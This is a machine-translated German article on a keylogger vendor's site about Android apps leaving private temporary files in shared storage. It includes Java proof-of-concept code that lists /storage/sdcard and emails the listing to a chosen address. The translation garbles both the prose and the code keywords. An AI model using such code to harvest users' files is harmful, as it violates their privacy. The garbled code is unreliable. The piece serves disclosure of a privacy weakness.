This is a machine translation. The original page (in English) is available here.
Windows
Mac OS
Mobile

Neueste news: November 12, 2016 - Wir haben einen neuen undetectable Tasten-Rekorder für Sie. RSS-Feed

Home>Artikel>Android-Anwendung Entwickler kümmern sich nicht um die Daten von Benutzern die Sicherheit, die bewirkt, dass Daten-Leck

AnyKeylogger für Mac

Android-Anwendung Entwickler kümmern sich nicht um die Daten von Benutzern die Sicherheit, die bewirkt, dass Daten-Leck

durch Habrahabr Benutzer

Es ist ein offenes Geheimnis, dass Android-apps sind notorisch anfällig für Daten-Leck, vor allem aufgrund Ihrer Entwickler. Noch eine weitere Tatsache, die bestätigt wurde es vor kurzem hier beschrieben habrahabr.ru - ein russischer Ressource, beliebt bei IT-Experten, insbesondere mit den app-Entwicklern.

Auf sein eigenes smartphone, der Autor der post bemerkt, Verzeichnisse und Dateien aus Anwendungen, die war schon lange gelöscht, in /storage/sdcard, und fragte sich, ob eine Android app in der Lage war zu Lesen von temporären Dateien aus anderen Apps.

Was temporäre Dateien und warum sollten wir für Sie sorgen? Diese Dateien enthalten Ihre Fotos, Telefon-Datensätze, die Datenbank der Tagebücher und viele andere Informationen, die Sie persönlich erachten, privaten und nicht wollen, um es für jedermann verfügbar ist.

In Android, temporäre Dateien von allen apps gespeichert sind, die in /storage/sdcard. Wenn eine app gelöscht wird, wird diese temps bleiben - falls der Entwickler nicht kümmern, die für das löschen in diesem Fall.

Ein Datei-manager heruntergeladen von google.spielen wird Ihnen ermöglichen, zu Lesen, temporäre Dateien von allen installierten apps auf dem Android-Gerät, einschließlich der unverschlüsselten Aufnahmen der Telefongespräche von boten-und sip-Telefonie-apps, Browser-Verlauf von Browsern, die playlists von Spielern, verschiedene Informationen aus sozialen Netzwerken, persönliche Notizen über die Dinge zu tun, von Tagebücher, et cetera.

Nur Lust: temp-Dateien von whatsapp ist ein beliebter messenger mit über 33 000 000 Benutzern, werden ebenfalls gespeichert, in /storage/sdcard; was mehr ist, werden nur Nachrichten verschlüsselt, die Fotos nicht. Whatsapp ist nur ein Beispiel von vielen; fast alle gängigen Anwendungen speichern Ihre persönlichen Daten in /storage/sdcard/%appName% und jede andere app hat Zugriff auf dieses Verzeichnis.

Zum Beispiel, diese messenger speichert Fotos geschickt, um Sie in das Verzeichnis für alle zugänglich, die die Anwendungen auf Ihrem Gerät, die über die Berechtigung zum Zugriff auf den Speicher:

Zum Beispiel, diese messenger speichert Fotos geschickt, Sie ohne jede Verschlüsselung; Bilder werden in dem Verzeichnis abgelegt, die für alle zugänglich sind, die Anwendungen auf Ihrem Gerät, die über die Berechtigung zum Zugriff auf den Speicher.Im schlimmsten Fall können diese Daten gestohlen werden, die auf den unbefugten Zugriff

Und dieses beliebte sip-client speichert es Einstellungen von Ihrem sip-account. Im schlimmsten Fall können diese Daten gestohlen werden, die auf den unbefugten Zugriff auf:

im schlimmsten Fall können diese Daten gestohlen werden, die auf den unbefugten Zugriff

Nun, bedeutet es, dass jemand stehlen Fotos von Ihrem Android-Gerät? Der Autor schrieb ein ziemlich kleines Programm in Java, die gesendet Struktur /storage/sdcard an eine angegebene E-Mail-Adresse.

Der source-code der app, die E-Mails die Struktur des Verzeichnis /storage/sdcard:

-----------------

Paket android.com.testapp;

importieren android.Inhalt.Vorsatz;
importieren android.os.Umwelt;
importieren android.Unterstützung.v7.app.AppCompatActivity;
importieren android.os.Bündel;
importieren android.Blick.Ansicht;
importieren android.- widget.- Taste;
importieren android.- widget.EditText;
importieren android.- widget.Toast;

import java.io.Datei;
import java.util.Datum;

public class MainActivity extends AppCompatActivity {
Taste emailButton;
EditText E-Mail;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R. layout.activity_main);

E-Mail = (EditText) findViewById(R. id.E-Mail);
emailButton = (Button) findViewById(R. id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}

protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.Fuß(new File(Environment.getExternalStorageDirectory().getAbsolutePath()));
}

private Klasse Filewalker {
private int count = 0;
private String sked = "";
public void walk(File root) {
count++;
File[] list = root.listFiles();
für (File f : Liste) {
if (f.isDirectory()) {
sked += "Zeit:" + new Date(f.lastModified()) + ", dir: "+ f.getAbsoluteFile() + "\n";
zu Fuss(f);
}
else {
sked += "Zeit:" + new Date(f.lastModified()) + ", size: "+ f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}

protected void sendMail(String sked) {
Intent i = new Intent(Intent.ACTION_SEND);
ich.setType("message/rfc822");
ich.putExtra(Intent.EXTRA_EMAIL, new String[]{E-Mail.getText().toString()});
ich.putExtra(Intent.EXTRA_SUBJECT, "android-Lager-Struktur");
ich.putExtra(Intent.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Sende mail..."));
} catch (android.Inhalt.ActivityNotFoundException ex) {
Toast.makeText(getApplicationContext(), "Es sind keine Mail-clients installiert." Toast.LENGTH_SHORT).show();
}
}

}

-----------------

Geben Sie die E-Mail-Adresse und die app E-Mails die Struktur des Verzeichnis /storage/sdcard; wie Sie wissen, kann dies getan werden, ohne zuvor eine E-Mail und nicht nur die Verzeichnis-Struktur, sondern auch die Dateien selbst gesendet werden können. Apps bei google.spielen Sie sind wahrscheinlich nicht sehr genau kontrolliert. Leider ist dies ein sehr effektives Werkzeug für die Vermarkter, da Sie immer wissen wollen, wie viel wie möglich über Ihre Nutzer. Unnötig zu sagen, dass die persönlichen Daten erhalten Sie auf diese Weise.

Und hier ist der Brief, den du erhalten; es enthält Inhalt von /storage/sdcard, d.h. es werden alle Dateien und Ordner aus die Anwendungen auf Ihrem Gerät installiert:

Es gibt keine Verzeichnisse und Dateien, die von Anwendungen von google.spielen, die Sie installiert haben, auf Ihrem mobilen Gerät und verwenden Sie jeden Tag - das ist das Verzeichnis sdcard von android-emulator.

Ansicht der Ordner /storage/sdcard mit beliebigen Datei-manager für android, als eine option, der ist verfügbar, wenn Sie schließen Sie Ihr Gerät an einen PC /Telefon; wenn Sie mit Messenger, soziale Netzwerke, eine task-scheduler, zu sehen, was theoretisch kann jeder android-Entwickler sehen, wer schrieb android.die Genehmigung.READ_EXTERNAL_STORAGE im manifest.

Also, die Schlussfolgerung ist klar: viele von denen, die Entwicklung von Anwendungen wie soziale Netzwerke, instant Messenger, sip-Telefonie-Kunden, die Tagebücher, die kümmern sich nicht um die Sicherheit der Daten der Nutzer.
Lesen Sie den vollständigen Artikel
Home>Artikel>Android-Anwendung Entwickler kümmern sich nicht um die Daten von Benutzern die Sicherheit, die bewirkt, dass Daten-Leck
WICHTIG!!!! Installation von computer-monitoring-tools auf Computern, die Sie nicht besitzen oder haben keine Berechtigung zum monitor kann gegen lokale, Staatliche oder bundesstaatliche Gesetz.
Suggest translation